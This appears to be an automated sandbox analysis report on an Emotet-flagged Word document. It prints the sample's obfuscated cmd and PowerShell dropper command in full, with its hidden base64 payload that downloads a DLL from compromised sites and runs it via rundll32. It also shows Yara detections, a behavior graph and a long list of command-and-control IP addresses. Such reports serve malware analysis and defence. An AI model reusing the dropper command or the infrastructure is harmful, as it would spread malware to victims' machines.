Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsA
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Emotet
Source: Yara match File source: 0000000E.00000002.2340258197.0000000000740000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2340368896.00000000007E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2114550082.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2102026803.00000000002D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2114093455.0000000000710000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2103817256.0000000000770000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2112160359.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2106310017.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2099609589.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2113942317.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2106250328.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2103543445.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2112213482.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2099871520.0000000000510000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2103566665.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2099349373.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2110427728.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2102360231.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2110654197.0000000000750000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2111292152.0000000000B10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2101833824.0000000000230000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2340125586.0000000000300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2110403391.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2112133272.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 9.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.740000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.750000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.740000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.b10000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.2e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.990000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.7b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.770000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.710000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.710000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.b10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.770000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.7b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.750000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.2e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.990000.1.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 344852 Sample: ARCH_25_012021.doc Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 48 1.226.84.243:8080 unknown unknown 2->48 50 104.130.154.83:7080 unknown unknown 2->50 52 91 other IPs or domains 2->52 56 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->56 58 Multi AV Scanner detection for domain / URL 2->58 60 Found malware configuration 2->60 62 16 other signatures 2->62 15 cmd.exe 2->15         started        18 WINWORD.EXE 293 30 2->18         started        signatures3 process4 signatures5 70 Suspicious powershell command line found 15->70 72 Very long command line found 15->72 74 Encrypted powershell cmdline option found 15->74 20 powershell.exe 12 9 15->20         started        25 msg.exe 15->25         started        process6 dnsIp7 54 shannared.com 192.169.223.13, 49167, 80 AS-26496-GO-DADDY-COM-LLCUS United States 20->54 46 C:\Users\user\Kaktksw\An6othh4649I.dll, PE32 20->46 dropped 66 Powershell drops PE file 20->66 27 rundll32.exe 20->27         started        file8 signatures9 process10 process11 29 rundll32.exe 27->29         started        process12 31 rundll32.exe 2 29->31         started        signatures13 76 Hides that the sample has been downloaded from the Internet (zone.identifier) 31->76 34 rundll32.exe 31->34         started        process14 process15 36 rundll32.exe 1 34->36         started        signatures16 64 Hides that the sample has been downloaded from the Internet (zone.identifier) 36->64 39 rundll32.exe 36->39         started        process17 process18 41 rundll32.exe 1 39->41         started        signatures19 68 Hides that the sample has been downloaded from the Internet (zone.identifier) 41->68 44 rundll32.exe 41->44         started        process20
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
200.75.39.254:80
 unknown unknown
unknown unknown true
192.175.111.212:7080
 unknown unknown
unknown unknown true
91.233.197.70:80
 unknown unknown
unknown unknown true
94.23.45.86:7080
 unknown unknown
unknown unknown true
81.4.105.175:8080
 unknown unknown
unknown unknown true
93.146.143.191:80
 unknown unknown
unknown unknown true
93.149.120.214:80
 unknown unknown
unknown unknown true
212.71.237.140:8080
 unknown unknown
unknown unknown true
46.101.58.37:8080
 unknown unknown
unknown unknown true
181.30.61.163:443
 unknown unknown
unknown unknown true
206.189.232.2:8080
 unknown unknown
unknown unknown true
181.10.46.92:80
 unknown unknown
unknown unknown true
213.52.74.198:80
 unknown unknown
unknown unknown true
87.106.253.248:8080
 unknown unknown
unknown unknown true
217.160.169.110
 unknown Germany
8560 ONEANDONE-ASBrauerstrasse48DE true
51.255.203.164
 unknown France
16276 OVHFR true
191.223.36.170:80
 unknown unknown
unknown unknown true
186.177.174.163:80
 unknown unknown
unknown unknown true
217.13.106.14:8080
 unknown unknown
unknown unknown true
138.97.60.141:7080
 unknown unknown
unknown unknown true
201.185.69.28:443
 unknown unknown
unknown unknown true
45.16.226.117:443
 unknown unknown
unknown unknown true
82.208.146.142:7080
 unknown unknown
unknown unknown true
192.169.223.13
 unknown United States
26496 AS-26496-GO-DADDY-COM-LLCUS true
1.226.84.243:8080
 unknown unknown
unknown unknown true
84.232.229.24
 unknown Romania
8708 RCS-RDS73-75DrStaicoviciRO true
70.32.115.157:8080
 unknown unknown
unknown unknown true
217.160.169.110:8080
 unknown unknown
unknown unknown true
85.105.239.184:443
 unknown unknown
unknown unknown true
152.170.79.100:80
 unknown unknown
unknown unknown true
143.0.85.206:7080
 unknown unknown
unknown unknown true
51.255.203.164:8080
 unknown unknown
unknown unknown true
94.176.234.118:443
 unknown unknown
unknown unknown true
50.28.51.143:8080
 unknown unknown
unknown unknown true
185.94.252.27:443
 unknown unknown
unknown unknown true
31.27.59.105:80
 unknown unknown
unknown unknown true
197.232.36.108:80
 unknown unknown
unknown unknown true
190.45.24.210:80
 unknown unknown
unknown unknown true
185.183.16.47:80
 unknown unknown
unknown unknown true
190.24.243.186:80
 unknown unknown
unknown unknown true
190.64.88.186:443
 unknown unknown
unknown unknown true
82.48.39.246:80
 unknown unknown
unknown unknown true
191.241.233.198:80
 unknown unknown
unknown unknown true
170.81.48.2:80
 unknown unknown
unknown unknown true
172.245.248.239:8080
 unknown unknown
unknown unknown true
154.127.113.242:80
 unknown unknown
unknown unknown true
95.76.153.115:80
 unknown unknown
unknown unknown true
211.215.18.93:8080
 unknown unknown
unknown unknown true
80.249.176.206:80
 unknown unknown
unknown unknown true
110.39.160.38:443
 unknown unknown
unknown unknown true
185.183.16.47
 unknown Spain
201453 AKIWIFIAKIWIFIES true
137.74.106.111:7080
 unknown unknown
unknown unknown true
5.196.35.138:7080
 unknown unknown
unknown unknown true
46.43.2.95:8080
 unknown unknown
unknown unknown true
188.135.15.49:80
 unknown unknown
unknown unknown true
177.23.7.151:80
 unknown unknown
unknown unknown true
68.183.190.199:8080
 unknown unknown
unknown unknown true
201.48.121.65:443
 unknown unknown
unknown unknown true
105.209.235.113:8080
 unknown unknown
unknown unknown true
94.126.8.1:80
 unknown unknown
unknown unknown true
60.93.23.51:80
 unknown unknown
unknown unknown true
62.84.75.50:80
 unknown unknown
unknown unknown true
190.247.139.101:80
 unknown unknown
unknown unknown true
138.97.60.140:8080
 unknown unknown
unknown unknown true
177.85.167.10:80
 unknown unknown
unknown unknown true
172.104.169.32:8080
 unknown unknown
unknown unknown true
51.255.165.160:8080
 unknown unknown
unknown unknown true
209.33.120.130:80
 unknown unknown
unknown unknown true
149.202.72.142:7080
 unknown unknown
unknown unknown true
12.163.208.58:80
 unknown unknown
unknown unknown true
84.232.229.24:80
 unknown unknown
unknown unknown true
81.17.93.134:80
 unknown unknown
unknown unknown true
152.231.89.226:80
 unknown unknown
unknown unknown true
87.106.46.107:8080
 unknown unknown
unknown unknown true
78.206.229.130:80
 unknown unknown
unknown unknown true
202.134.4.210:7080
 unknown unknown
unknown unknown true
51.38.124.206:80
 unknown unknown
unknown unknown true
187.162.248.237:80
 unknown unknown
unknown unknown true
152.169.22.67:80
 unknown unknown
unknown unknown true
12.162.84.2:8080
 unknown unknown
unknown unknown true
190.162.232.138:80
 unknown unknown
unknown unknown true
122.201.23.45:443
 unknown unknown
unknown unknown true
109.101.137.162:8080
 unknown unknown
unknown unknown true
85.214.26.7:8080
 unknown unknown
unknown unknown true
116.125.120.88:443
 unknown unknown
unknown unknown true
188.225.32.231:7080
 unknown unknown
unknown unknown true
104.130.154.83:7080
 unknown unknown
unknown unknown true
190.251.216.100:80
 unknown unknown
unknown unknown true
104.131.41.185:8080
 unknown unknown
unknown unknown true
80.15.100.37:80
 unknown unknown
unknown unknown true
81.215.230.173:443
